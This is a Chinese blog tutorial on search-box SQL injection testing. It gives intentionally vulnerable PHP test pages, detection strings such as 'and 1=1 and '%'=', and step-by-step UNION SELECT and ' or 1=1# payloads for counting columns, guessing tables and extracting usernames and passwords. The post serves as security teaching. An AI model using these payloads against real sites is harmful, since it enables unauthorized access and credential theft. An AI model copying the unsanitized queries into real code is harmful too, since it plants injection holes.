安全测试-sql注入搜索框

最新推荐文章于 2024-05-15 23:16:18 发布
最新推荐文章于 2024-05-15 23:16:18 发布
阅读量4.2k 收藏 25
点赞数 2
分类专栏: mysql脚本 测试工具 文章标签: 数据库
原文链接:https://blog.csdn.net/weixin_42277564/article/details/94401484
版权

一、搜索型注入简介与原理

1)简介
一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在:


其中又分为POST/GET,GET型的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索型注入又称为文本框注入。


2)原理

$sql="select * from user where password like '%$pwd%' order by password";

 
这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。但是如果有人输入这样的内容呢?

'and 1=1 and '%'='


这样的话这句SQL语句就变成了这样:

select * from user where password like '%fendo'and 1=1 and '%'='%' order by password

存在SQL注入。

二、搜索型注入判断
 判断搜索型注入的方法:

1 搜索keywords‘,如果出错的话,有90%的可能性存在漏洞;

2 搜索 keywords%,如果同样出错的话,就有95%的可能性存在漏洞;

3 搜索keywords% 'and 1=1 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=1)看返回的情况

4 搜索keywords% 'and 1=2 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=2)看返回的情况

5 根据两次的返回情况来判断是不是搜索型文本框注入了



下面这几种语句都可以:

'and 1=1 and '%'='

%' and 1=1--'

%' and 1=1 and '%'='


 
 三、搜索型注入实战


1)GET型注入
 
测试源码:

    <?
    $pwd=$_GET['pwd'];
    $conn=mysql_connect("127.0.0.1","root","123");//连接mysql数据库
    if($conn){
    	echo "连接数据库成功!"; 
    }//判断连接是否成功
    echo "<br>";
    mysql_select_db('fendo',$conn);//选择连接请求为conn的数据库(fendo)
    $sql="select * from user where password like '%$pwd%' order by password"; //字符型搜索语句
    $result=mysql_query($sql);
    while($row = mysql_fetch_array($result)){ 
    	echo "用户ID:".$row['id']."<br >";
    	echo "用户名:".$row['username']."<br >";
    	echo "用户密码:".$row['password']."<br >";
    	echo "用户邮箱:".$row['email']."<br >";
    }
    mysql_close($conn); //关闭数据库连接
    echo "<hr>";
    echo "你当前执行的sql语句为:"."<br >";
    echo $sql;
    ?>


 
1.判断字段数

语句:

%' union select 1,2,3,4,...... and '%'='

 

1.jpg



还有种方法
语句:

  %' and exists (select id from user where LENGTH(username)<6 and id=1) and '%'='


把6这个数字逐次更换,直到他不报错为止。如下当它小于6时正确,说明字段数为5。
 

2.jpg




2.判断表名

语句:

%'and(select count(*)from admin)>0 and '%'='

 

3.jpg



把admin这个表名逐次更换,直到他不报错为止,就说明这个表存在。


3.猜解密码

由于这里用的就是密码,所以这里换成猜解用户名
 
 
2)POST型注入

测试源码:

<?  

//--------------------------post处理--------------------------------//  

$name=addslashes($_POST['n']);   

$pass=addslashes($_POST['p']);  

$conn = mysql_connect('127.0.0.1','root','123');   

if($conn){  

    echo "mysql连接成功";  

    echo "<hr>";    

}  

mysql_select_db('fendo',$conn);    

$sql="select * from user where username='$name' and password='$pass'";  

$result=mysql_query($sql);  

mysql_close($conn);  

while($row = mysql_fetch_array($result)){  

    echo "用户ID:".$row['id']."<br >";  

    echo "用户名:".$row['username']."<br >";  

    echo "用户密码:".$row['password']."<br >";  

}  

echo "当前执行的sql语句:".$sql;  

?>  

 

<form action="" method="POST">  

账号:<input name="n" type="text" /><br><br>  

密码:<input name="p" type="text" /><br><br>  

<input name="" type="submit" value="提交" />  

 

</form>

 

4.jpg




1.判断是否存在SQL注入

用PHP万能密码进行测试

' or 1=1#

 

5.jpg





在用户名里输入万能密码如果没报错,就说明存在SQL注入。
 
 
2.猜字段数

' order by 4#

 

6.jpg



逐次更改数字去猜,直到不报错为止。
 
 
3.猜表名

'or 1=1 union select 1,2,3,4 #

 

7.jpg



逐次累加数字,直到不报错为止。
 
 
4.猜内容
 
替换1,2,3为你想要获得的内容
 

8.jpg

'or 1=1 union select username,password,3,4 from user#


 
 
 

努力攀登者songmc
关注
  • 2
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安全测试-SQL注入
qq_42008891的博客
03-08 1395
SQL注入是针对一种数据库而言的,而不是针对网页语言。在任何使用了数据库查询环境下都可能存在。常见的数据库包括:MySQL、Oracle、Db2等。针对不同的数据库系统使用的一些函数会有所不同,不过从测试是否存在SQL注入的角度考虑,只需要进行几个最基本的判断语句就可以了。由于SQL注入有可能造成信息泄漏,在严重情况下(根据使用的数据库而定)甚至可能造成数据修改、删除,从而导致业务中断。因此必须发现所有存在的注入点。
安全测试——SQL注入
成都汇智动力的博客
07-31 772
SQL注入是Web系统安全攻击的常见手段,攻击者通过构建特殊的输入或非法的SQL命令插入表单或页面请求的字符串中后提交,从而达到利用服务器执行恶意SQL语句的目的。SQL注入攻击成功后,可直接屏蔽服务器验证,获取访问权限,甚至获取服务器的最高权限,执行篡改记录等恶意行为。 容易被实施SQL注入的主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL注入根据注入技术原理的不同,一般分为数据库平台注入和程序代码注入。数据库平台SQL注入由Web系统使用的数据库平台配置不...
搜索框——不能忽视的XSS漏洞—搜索框所引起的XSS漏洞
06-12
我刚入行的时候做过一个小小的页面工具,其中有一个步骤是把一些代码输出到页面上,当时我用的是php做的,写了个for循环,读取每一行的内容,然后echo出来。但是我发现页面排版老是那么的乱,怎么缩进都没有了?有一些代码还显示不出来?这太让我纳闷了,于是问一个学长是怎么一回事,他说:“当然啦,你输出的内容被浏览器解释过后的样子就是这样子的了,比如说你的空格浏览器是不承认的,你要输出空格就得用nbsp; ……”这时我才反应过来:“哦,原来如此……”。那时我才知道,在html的输出上代码和内容还是得程序员自己去区分的。
搜索型SQL注入及SQL漏洞测试
weixin_44720762的博客
03-31 5416
搜索型注入原理和数据型,字符型注入相差不大,都是通过构造一个合法的语句,当参数传入后台后,造成一个合法的SQL语句闭合,从而将数据库里的数据遍历出来。 首先打开客户端寻找纯在SQL注入漏洞的注入点。 通过提示可知,尝试输入一个提示字符进行搜索,z 这里我们输入字母’l’,可以看见后台给出的相关信息。 通过后台给出的数据,和平台给的输入提示。我们可以设想后台是否用了搜索逻辑去进行相关数据的搜索从而...
SQL注入常见类型及注入点的判断
最新发布
qq_64395221的博客
05-15 862
字符注入的时候我们需要逃逸单引号,但是php提供了魔术引号开关magic_quotes_gpc和addslashes(),iconv()函数作为防御,特点是自动给传入的参数如单引号,双引号,反斜杠,%00前面加一个反斜杠,进行转义,避免单引号进行逃逸。id=1这种形式的url,这个时候我们输入and 1=1与and 1=2,进行判定看是否会出现and 1=1回显正常,and 1=2回显不正常的情况。sql语句的变量并不是直接传入的变量,而是通过其它的方式保存到了数据库,形成二次注入。
Pickachu第四弹:SQL注入
Pisces_mango的博客
09-03 1100
目录 一、数字型注入(post) 二、字符型输入(get) 三、搜索型注入 四、xx型注入 五、“insert/update”注入 六、“delete”型注入 七、“http header”注入 八、盲注(base on boolian) 九、盲注(base on time) 十、宽字节注入 十一、手工测试流程 十二、报错利用流程 一、数字型注入(post) 看到输入点后,我们想象一下它在数据库中是怎样操作的,select 字段1,字段2 from 表名 where id=1
SQL注入基础
m0_73477772的博客
04-29 1988
SQL注入基础
SQL注入:搜索型注入
qxx5203的博客
07-22 2594
SQL语句selectusername,idfromadminwhereusernamelike'%$name%'"%"匹配任何字符,"like"的意思就是像,"$"变量。正常回显,却无法判断字段数,也无法查看报错位。数据库表的信息(blog,heroes,movies,进入靶场后出现此界面,在登录界面输入。8页面显示不正常,发现最大正常位是。数据库列的信息id,num,判断一下是数字型还是字符型。账号密码错误或用户未注册!搜索框内输入a正常回显。...
关于sql注入这一篇就够了(适合入门)
qq_53105813的博客
01-07 4916
sql注入详解
CTF-AWD-Yunnan_1防守和攻击
御七彩虹猫
03-24 2626
CTF-AWD-Yunnan_1防守和攻击
常见的web漏洞之 sql注入
weixin_47399833的博客
11-17 1572
简单学习一下网络安全啦
Seringa:Seringa - SQL 注入框架
06-27
塞林加Seringa - SQL 注入框架Seringa(罗马尼亚语为 seringe)是一个 SQL 注入框架,具有高度可定制性和用户友好的界面。 它是完全开源的。 GUI 使用 .NET 4.0 框架和 Windows Presentation Foundation (WPF)。 在...
第14天:WEB漏洞-SQL注入之类型及提交注入1
08-03
本文将详细介绍SQL注入的类型及其提交方式,以及如何进行安全测试。 首先,我们需要了解数据的提交类型。在Web应用中,数据可以通过多种方式传递给服务器: 1. **数字型参数**:通常用于传递数值,如ID或年龄。...
超级SQL注入工具超级SQL注入工具
12-04
"超级SQL注入工具"可能是一个专门用于检测和利用这种漏洞的软件,用于测试系统的安全性或者进行非法活动。 在网络安全领域,了解SQL注入及其防御方法至关重要。SQL注入攻击通常通过以下步骤进行: 1. **识别入口点...
SQL-zhu-ru--dai-ma.rar_sql注入
09-14
SQL注入是一种常见的网络安全威胁,它发生在应用程序不恰当地构建SQL查询时,允许攻击者通过输入恶意数据来操纵数据库。在“SQL-zhu-ru--dai-ma.rar_sql注入”这个压缩包中,我们很可能会找到一系列关于如何识别、...
自己动手编写SQL注入漏洞扫描工具
12-31
SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取敏感信息或执行非法操作。这个项目可能是用某种编程语言(如Python、Java或C#)实现的,目标是帮助开发者和安全研究...
SQL注入超详细
qq_57573970的博客
05-22 409
操作系统数据库数据库用户数据库版本其他(网站路径等)
SQL注入:搜索型盲注(手工注入)
qxx5203的博客
07-22 1194
看看有没有注入点,页面异常。也尝试了其他手工注入的方法,仍然异常。判断一下是数字型还是字符型,页面异常。6页面显示不正常,发现最大正常位是5。,我们在搜索框中发现注入点。搜索框内输入a正常回显。进入靶场后出现此界面,在。用户名输入1’,密码任意。数据库列的信息id,...
SQL语句关于数据库安全性
qq_43058317的博客
11-18 976
sql语句关于数据库安全性 cc评估保证级(EAL)的划分 评估保证级 定义 TCSEC安全级别(近似相当) EAL1 功能测试 EAL2 结构测试 C1 EAL3 系统地测试和检查 C2 EAL4 系统地涉及,测试和复查 B1 EAL5 半形式化涉及和测试 B2 EAL6 半形式化验证的设计和测试 B3 EAL7 形
测试搜索框时怎么sql注入
07-27
在测试搜索框时,可以使用一些特殊字符或语句来进行SQL注入。根据引用\[2\]中的方法,可以尝试以下几种方式来进行测试: 1. 搜索关键词',如果出现错误,有90%的可能性存在漏洞。 2. 搜索关键词%,如果同样出现错误,就有95%的可能性存在漏洞。 3. 搜索关键词% 'and 1=1 and '%'=',这个语句的功能相当于普通SQL注入的 and 1=1,观察返回的情况。 4. 搜索关键词% 'and 1=2 and '%'=',这个语句的功能相当于普通SQL注入的 and 1=2,观察返回的情况。 5. 根据前面两次的返回情况来判断是否存在搜索型文本框注入。 通过尝试以上方法,可以判断搜索框是否存在SQL注入漏洞。请注意,在实际操作中,需要谨慎处理和遵守法律规定,仅在合法授权的情况下进行测试。 #### 引用[.reference_title] - *1* *2* [SQL注入-搜索型输入](https://blog.csdn.net/weixin_42277564/article/details/94401484)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [搜索型SQL注入及SQL漏洞测试](https://blog.csdn.net/weixin_44720762/article/details/88935596)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值